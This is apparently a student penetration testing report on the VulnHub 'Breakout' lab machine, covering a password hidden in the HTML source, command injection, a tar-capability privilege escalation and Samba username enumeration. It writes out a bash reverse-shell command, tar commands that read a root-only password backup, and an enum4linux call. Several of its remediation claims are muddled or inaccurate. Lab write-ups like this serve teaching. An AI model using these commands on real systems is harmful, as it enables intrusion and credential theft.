Penetration Testing Report for
Vuln Hub Company
1.Document information
Report owner Abhiram SS
Pen-tester Abhiram SS
Date last updated 2022-08-22
Machine Name: Breakout
Link : https://www.vulnhub.com/entry/empire-breakout,751/
Index
1 . Document information
2.Executive Summary
2.1 Graph …………………………………………… 3
2.2 Disclosed Vulnerabilities…………………….. 4
3 Findings and Recommendations …………………….. 7
3.1 Critical Risk Vulnerabilities………………….. 7
3.1.1 Encoded Password disclosure in HTML. 7
3.2 High Risk Vulnerabilities……………………... 9
3.2.1 Command injection……………………… 9
3.2.2 Password Disclosure in Tar File ……… 10
3.3 medium Risk Vulnerabilities ………………….. 13
2.3.1 Username Disclosure in RID Cycling…. 13
Executive Summary
Breakout machine in vulnhub platform's is used to find vulnerabilities in the machine, and testing
revealed a number of flaws, including several high-risk flaws that could allow unauthorized
access to sensitive information. In this report, we have gained "root privilege," which is
full control over the machine, so in this report there is complete walkthrough of how got root
privilege.
1.1 Graph
Findings
Critical High Medium Low
10 10
80
4.1 Disclosed Vulnerabilities
Ref Severity Vulnerability Description Recommendation
CRITICAL Encoded password A webpage was Sensitive data, files and
disclosure in the HTML discovered during the any other item of
penetration test If we information that do not
look at the bottom of need to be on the web
the page’s source servers should never be
code, we see a text uploaded on the web
encrypted by the server. Don’t provide
brainf*ck algorithm. any attackers with clues
Where hackers can about application
decrypt the cypher behavior unnecessarily.
and get access to On the home page of
login page in the web port 80, we see a default
server. Apache page. However,
upon opening the source
of the page, we see a
brainf*ck cypher. We
can decrypt the cypher
which is menace to the
organization.
HIGH Command injection A webpage was We should use Strong
discovered during the input validation input into
penetration test commands, we can
which allows users to achieve this by using a
ping another machine whitelist for strings or
on the internet. But allowed characters. There
due to missing input is tool called Bright where
validation it’s it will examine your
possible for a application for OS
command
malicious person to
Injection vulnerabilities.
inject commands into
the user field. Which
means that the
commands besides
pinging a host, can
also execute
additional commands
given by the user.
This could lead to
complete
compromise of the
underlying system
.
HIGH Password Disclosure in After getting into After gaining the shell
Tar File the server, there was always hacker will search
a tar binary. So, we for the binaries files
got the exploitable present in the server,so
point for the root try remove or keep a
privilege. The tar strong password for the
file was the key to files so your webpage
the root privilege. will secured
So, the server was in
command thanks to
this binary file. so,
hackers can change
or upload decayed
files, which will
affect your file
system. So, this may
lead to rebellion
against the system.
Medium Username Disclosure in Username The Samba server is the
RID Cycling Disclosure in RID greatest threat outside
Cycling, which your immediate
allows users to network. By default,
easily obtain Samba will accept
usernames by connections from any
enumerating Samba host, which means that if
shares, which causes you run an insecure
critical damage to version of Samba on a
the database and host that is directly
server, may result in connected to the
username disclosure, internet, it can be
in which all Vulnerable. Another
usernames are good solution is to
leaked. This could upgrade Samba to a
lead to a complete version where the bug
compromise of the has been fixed. So, the
underlying systems. username was found in
the Samba enumeration,
which is Imminence to
the company. The
enumeration gave me
the username of the
machine as cyber. Using
this username and the
previously found
password, I could log
into the web server.
.
4 Findings and recommendations
Critical risk vulnerabilities
The issues marked as "critical severity" can allow attackers to execute code on the web
application or application server or access sensitive data. A critical A vulnerability is one where
an exploit or proof-of-concept code is publicly available or being actively exploited.
Encoded password disclosure in the HTML
During the test, we identified the password as disclosure in the HTML page, which is critical
damage to the server. The ciphers are displayed in the HTML page and can be easily decrypted
by standard tools for ciphers. As a result, avoid putting ciphers on your website, which will cause
the server to crash.
Affected Host
http://198.168.19.130
Proof
The ciphers at the end of the page.
After decrypting the ciphers, we got the password for the login page.
By using the decrypting tools (https://www.dcode.fr/brainfuck-language), we got the password
for the login page. In the above screenshot, we can see there is a text where it says password for
the user cyber.
Remediation
To prevent this, we need to avoid uploading the decrypted texts to the web server.
That is the best way to secure our webpage, so avoid uploading the ciphers so it
will be more secure from the hackers.
References
https://portswigger.net/kb/issues/006000b0_source-code-disclosure
https://www.beyondsecurity.com/resources/vulnerabilities/source-
disclosure/
https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-
guide/page/source_code_disclosure.htm
4.Hxigh risk vulnerabilities
High risk vulnerabilities can be high damage to the server so it may lead to data-leakage that will
be very harmful to Company Data
Command injection
During the test, we identified https://192.168.19.130:20000/shell/?xnavigation=1. has command
injection vulnerabilities. In the above URL, there are high-risk vulnerabilities, so hackers can
easily write bad scripts in that place. So please remove the "command injection" part of the login
page so that your data is safe and secure.
Affected Hosts:
https://192.168.19.130:20000/shell/?xnavigation=
Proof:
Execution Command Injection
In the above image, we can see that the hacker has written bad script in the command injection
part; this is the place where Hacker will get shell, which means he will get full control over the
web server. So please remove this command shell part from the web page.
Gaining the shell from above Bad Script
Command Used: bash -i >& /dev/tcp/<ip>/1234 0>&1
By using this script, I got shell from the web page, the remote shell is shown in above screenshot
where I am inside the webserver so I am able to see hole data inside the webserver.
Remediation
The most effective way to prevent command injection is to remove the Command shell from the
login page so no hacker can execute the bad command in the webpage. That is the part where
hackers can easily get into the server, and they will have full control over the server .
References
https://portswigger.net/web-security/os-command-injection
https://brightsec.com/blog/os-command-injection/\
https://resources.infosecinstitute.com/topic/how-to-mitigate-command-
injection-vulnerabilities/
Password Disclosure in Tar File
After getting shell from command injection, we listed out suspicious tar binaries owned by root,
which we could execute, and that was key for the root access.
Proof
Tar File Inside the webserver
After enumeration on the machine, we see that there is old_pass.bak file located in /var/backups
but we don’t have the required permissions to view the file contents
Command Used: cd /var/backups/
Let’s get back to tar file so we try to do anything with it.so we have get more information about
the capabilities which exists here. So we will try see the capabilities in the webserver
Command Used: getcap tar
The tar file has following capabilities:
cap_dac read_search= Bypass file read permission checks and directory read and execute
permission checks.
We can compress the contents of the old_pass.bak file in a tarball and then extract it. This should
provide us the the required permissions to view the contents of the file.
Command Used: ./tar -cf pass.tar /var/backups/.old_pass.bak
Command Used :tar -xf pass.tar
Command Used: cat var/backups/.old_pass.bak
So after executing the commands we got the root password .using the credential we can log into
the root account and we can get full access
First, we will change the user into root with credentials
Command Used: su root
Then we can see we got access to root so we can change or modify the webpage
Command Used: cat root.txt
Remediation
It is advised to remove the tar file so that hacker cannot get the root access through binary files .
References
https://man7.org/linux/man-pages/man7/capabilities.7.html
https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/
Medium risk vulnerabilities
Username Disclosure in RID Cycling
The webpage https://192.168.19.130:20000 is vulnerable to username disclosure. While
enumerating the webpage, we found Samba running on the machine. So, I used the enum4linux
tool to check the Samba shares. So we found user Cyber after enumerating the Samba share.
Affected Hosts:
https://192.168.19.130:20000
Proof:
In the Screenshot below you can see the User Cyber
Command Used: enum4linux -a <ip>
Remediation
It is recommended to upgrade the version of samba so there will no disclosure .There are so
many alternatives for samba server that are SuitDash,lgloo so this is more secure than samba.
References
https://www.g2.com/products/samba-server-ready-to-go/competitors/alternatives